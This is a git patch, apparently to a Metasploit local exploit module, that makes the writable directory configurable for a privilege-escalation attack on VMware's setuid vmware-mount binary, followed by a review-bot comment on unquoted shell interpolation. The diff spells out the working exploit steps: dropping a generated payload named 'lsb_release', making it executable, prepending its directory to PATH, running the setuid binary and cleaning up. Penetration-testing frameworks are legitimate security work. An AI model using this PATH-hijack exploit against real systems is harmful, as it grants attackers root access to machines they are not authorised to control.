From 25ecf73d7d472a84fa5c50d6623c23203e585e0f Mon Sep 17 00:00:00 2001
From: Rasta Mouse
Date: Thu, 27 Nov 2014 17:12:37 +0000
Subject: [PATCH] Add configurable directory, rather than relying on the session working directory.
---
 modules/exploits/linux/local/vmware_mount.rb | 13 ++++++++-----
 1 file changed, 8 insertions(+), 5 deletions(-)
diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb
index 17510b7118..cd089b38b6 100644
--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -53,6 +53,9 @@ class Metasploit4 < Msf::Exploit::Local
 'DisclosureDate' => "Aug 22 2013"
 }
 ))
+ register_options([
+ OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]),
+ ], self.class)
 end
 
 def check
@@ -68,13 +71,13 @@ class Metasploit4 < Msf::Exploit::Local
 fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
 end
 
- write_file("lsb_release", generate_payload_exe)
-
- cmd_exec("chmod +x lsb_release")
- cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
+ path = "#{datastore["WritableDir"]}"
+ write_file("#{path}/lsb_release", generate_payload_exe)
+ cmd_exec("chmod +x #{path}/lsb_release")
+ cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount")
 # Delete it here instead of using FileDropper because the original
 # session can clean it up
- cmd_exec("rm -f lsb_release")
+ cmd_exec("rm -f #{path}/lsb_release")
 end
 
 def setuid?(remote_file)
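Review bot: The new `WritableDir` value is interpolated unquoted into three shell strings in the second hunk (`chmod +x #{path}/lsb_release`, the `PATH=#{path}:$PATH` call and `rm -f #{path}/lsb_release`), so a value containing whitespace or shell metacharacters changes what those commands operate on, most notably what `rm -f` deletes. Escape the file path once and reuse it, e.g. `exe = Shellwords.escape("#{path}/lsb_release")` for the `chmod` and `rm` calls, assuming `shellwords` is loaded in this environment. The assignment `path = "#{datastore["WritableDir"]}"` also wraps a string in a redundant interpolation; `path = datastore["WritableDir"]` reads more clearly. The enclosing method begins above the hunk, so any earlier validation of the option is not visible here.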